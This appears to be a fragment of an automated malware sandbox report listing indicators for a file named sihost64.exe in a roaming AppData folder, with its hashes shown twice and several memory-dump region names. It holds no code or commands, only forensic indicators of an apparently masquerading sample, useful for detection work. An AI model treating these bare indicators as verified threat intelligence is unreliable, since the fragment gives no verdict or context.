C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 480af431f9b7f20202cbeef81ccb9a8e |
| SHA1 | 65ef2c809b571e75809074afeae02950f3404441 |
| SHA256 | 862c961c71218944d9f0724562f487f8396d91803da4e1678ddb0042d843c64b |
| SHA512 | 23737eb0a0d2a2ffa728690ceeb3b534838cb889bd0a0b206b0147fa4cef05427c8dac3ecea5c6bf98e899f81d70d7510af9267569e3dad4e752d4aec4ff3951 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 480af431f9b7f20202cbeef81ccb9a8e |
| SHA1 | 65ef2c809b571e75809074afeae02950f3404441 |
| SHA256 | 862c961c71218944d9f0724562f487f8396d91803da4e1678ddb0042d843c64b |
| SHA512 | 23737eb0a0d2a2ffa728690ceeb3b534838cb889bd0a0b206b0147fa4cef05427c8dac3ecea5c6bf98e899f81d70d7510af9267569e3dad4e752d4aec4ff3951 |
memory/3608-509-0x000000014030F3F8-mapping.dmp
memory/2004-518-0x000001A593910000-0x000001A593916000-memory.dmp
memory/3608-523-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2004-524-0x000001A591D90000-0x000001A591D96000-memory.dmp